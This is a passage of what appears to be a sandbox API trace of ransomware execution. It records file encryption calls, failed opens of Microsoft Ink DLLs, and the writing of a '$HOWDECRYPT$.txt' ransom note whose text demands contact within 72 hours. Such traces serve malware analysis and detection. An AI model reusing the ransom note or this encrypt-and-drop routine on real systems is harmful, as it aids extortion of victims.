pbBuffer=0x57e390) returned 1 [0178.925] GetProcessHeap () returned 0x2c0000 [0178.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.925] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e388*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e388*=0x30) returned 1 [0178.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\micaut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.925] GetProcessHeap () returned 0x2c0000 [0178.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.926] GetProcessHeap () returned 0x2c0000 [0178.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b970 | out: hHeap=0x2c0000) returned 1 [0178.926] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e388 | out: pbBuffer=0x57e388) returned 1 [0178.926] GetProcessHeap () returned 0x2c0000 [0178.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.926] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e380*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e380*=0x30) returned 1 [0178.926] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\journal.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.930] GetProcessHeap () returned 0x2c0000 [0178.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.930] GetProcessHeap () returned 0x2c0000 [0178.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66dc0 | out: hHeap=0x2c0000) returned 1 [0178.930] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e388 | out: pbBuffer=0x57e388) returned 1 [0178.930] GetProcessHeap () returned 0x2c0000 [0178.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.930] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e380*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e380*=0x30) returned 1 [0178.930] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\inkobj.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.931] GetProcessHeap () returned 0x2c0000 [0178.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.931] GetProcessHeap () returned 0x2c0000 [0178.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b898 | out: hHeap=0x2c0000) returned 1 [0178.931] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e380 | out: pbBuffer=0x57e380) returned 1 [0178.931] GetProcessHeap () returned 0x2c0000 [0178.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.931] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e378*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e378*=0x30) returned 1 [0178.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\inkdiv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.931] GetProcessHeap () returned 0x2c0000 [0178.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.931] GetProcessHeap () returned 0x2c0000 [0178.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b7c0 | out: hHeap=0x2c0000) returned 1 [0178.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\hwrcustomization\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.932] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.932] WriteFile (in: hFile=0x9c, lpBuffer=0x57e2b3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e3dc, lpOverlapped=0x0 | out: lpBuffer=0x57e2b3*, lpNumberOfBytesWritten=0x57e3dc*=0x127, lpOverlapped=0x0) returned 1 [0178.933] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.933] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e3dc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e3dc*=0x2ac, lpOverlapped=0x0) returned 1 [0178.933] CloseHandle (hObject=0x9c) returned 1 [0178.933] GetProcessHeap () returned 0x2c0000 [0178.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4e1e8 | out: hHeap=0x2c0000) returned 1 [0178.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.935] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.935] WriteFile (in: hFile=0x9c, lpBuffer=0x57e2af*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e3d8, lpOverlapped=0x0 | out: lpBuffer=0x57e2af*, lpNumberOfBytesWritten=0x57e3d8*=0x127, lpOverlapped=0x0) returned 1 [0178.936] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.936] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e3d8*=0x2ac, lpOverlapped=0x0) returned 1 [0178.936] CloseHandle (hObject=0x9c) returned 1 [0178.936] GetProcessHeap () returned 0x2c0000 [0178.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e808a0 | out: hHeap=0x2c0000) returned 1 [0178.936] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e378 | out: pbBuffer=0x57e378) returned 1 [0178.936] GetProcessHeap () returned 0x2c0000 [0178.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.936] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e370*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e370*=0x30) returned 1 [0178.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.936] GetProcessHeap () returned 0x2c0000 [0178.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.936] GetProcessHeap () returned 0x2c0000 [0178.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e807b0 | out: hHeap=0x2c0000) returned 1 [0178.937] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e370 | out: pbBuffer=0x57e370) returned 1 [0178.937] GetProcessHeap () returned 0x2c0000 [0178.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.937] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e368*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e368*=0x30) returned 1 [0178.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.948] GetProcessHeap () returned 0x2c0000 [0178.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.948] GetProcessHeap () returned 0x2c0000 [0178.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e806c0 | out: hHeap=0x2c0000) returned 1 [0178.948] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e370 | out: pbBuffer=0x57e370) returned 1 [0178.948] GetProcessHeap () returned 0x2c0000 [0178.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.948] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e368*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e368*=0x30) returned 1 [0178.948] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.948] GetProcessHeap () returned 0x2c0000 [0178.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.948] GetProcessHeap () returned 0x2c0000 [0178.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8770 | out: hHeap=0x2c0000) returned 1 [0178.949] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e368 | out: pbBuffer=0x57e368) returned 1 [0178.949] GetProcessHeap () returned 0x2c0000 [0178.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.949] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e360*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e360*=0x30) returned 1 [0178.949] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.949] GetProcessHeap () returned 0x2c0000 [0178.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.949] GetProcessHeap () returned 0x2c0000 [0178.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e803f0 | out: hHeap=0x2c0000) returned 1 [0178.949] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e368 | out: pbBuffer=0x57e368) returned 1 [0178.949] GetProcessHeap () returned 0x2c0000 [0178.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.949] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e360*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e360*=0x30) returned 1 [0178.949] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.949] GetProcessHeap () returned 0x2c0000 [0178.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.949] GetProcessHeap () returned 0x2c0000 [0178.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e80300 | out: hHeap=0x2c0000) returned 1 [0178.950] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.7\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.950] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.950] WriteFile (in: hFile=0x178, lpBuffer=0x57e297*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e3c0, lpOverlapped=0x0 | out: lpBuffer=0x57e297*, lpNumberOfBytesWritten=0x57e3c0*=0x127, lpOverlapped=0x0) returned 1 [0178.951] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.951] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e3c0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e3c0*=0x2ac, lpOverlapped=0x0) returned 1 [0178.951] CloseHandle (hObject=0x178) returned 1 [0178.951] GetProcessHeap () returned 0x2c0000 [0178.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e80210 | out: hHeap=0x2c0000) returned 1 [0178.951] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e360 | out: pbBuffer=0x57e360) returned 1 [0178.951] GetProcessHeap () returned 0x2c0000 [0178.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.952] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e358*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e358*=0x30) returned 1 [0178.952] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\Microsoft.Ink.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.7\\microsoft.ink.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.952] GetProcessHeap () returned 0x2c0000 [0178.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.952] GetProcessHeap () returned 0x2c0000 [0178.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e80120 | out: hHeap=0x2c0000) returned 1 [0178.952] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.953] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.953] WriteFile (in: hFile=0x178, lpBuffer=0x57e28f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e3b8, lpOverlapped=0x0 | out: lpBuffer=0x57e28f*, lpNumberOfBytesWritten=0x57e3b8*=0x127, lpOverlapped=0x0) returned 1 [0178.953] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.953] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e3b8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e3b8*=0x2ac, lpOverlapped=0x0) returned 1 [0178.954] CloseHandle (hObject=0x178) returned 1 [0178.954] GetProcessHeap () returned 0x2c0000 [0178.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e80030 | out: hHeap=0x2c0000) returned 1 [0178.954] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e358 | out: pbBuffer=0x57e358) returned 1 [0178.954] GetProcessHeap () returned 0x2c0000 [0178.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.954] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e350*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e350*=0x30) returned 1 [0178.954] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.0\\microsoft.ink.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.954] GetProcessHeap () returned 0x2c0000 [0178.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.954] GetProcessHeap () returned 0x2c0000 [0178.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7ff40 | out: hHeap=0x2c0000) returned 1 [0178.954] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.958] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.958] WriteFile (in: hFile=0x178, lpBuffer=0x57e287*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e3b0, lpOverlapped=0x0 | out: lpBuffer=0x57e287*, lpNumberOfBytesWritten=0x57e3b0*=0x127, lpOverlapped=0x0) returned 1 [0178.958] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.958] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e3b0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e3b0*=0x2ac, lpOverlapped=0x0) returned 1 [0178.959] CloseHandle (hObject=0x178) returned 1 [0178.959] GetProcessHeap () returned 0x2c0000 [0178.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8688 | out: hHeap=0x2c0000) returned 1 [0178.959] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e350 | out: pbBuffer=0x57e350) returned 1 [0178.959] GetProcessHeap () returned 0x2c0000 [0178.959] 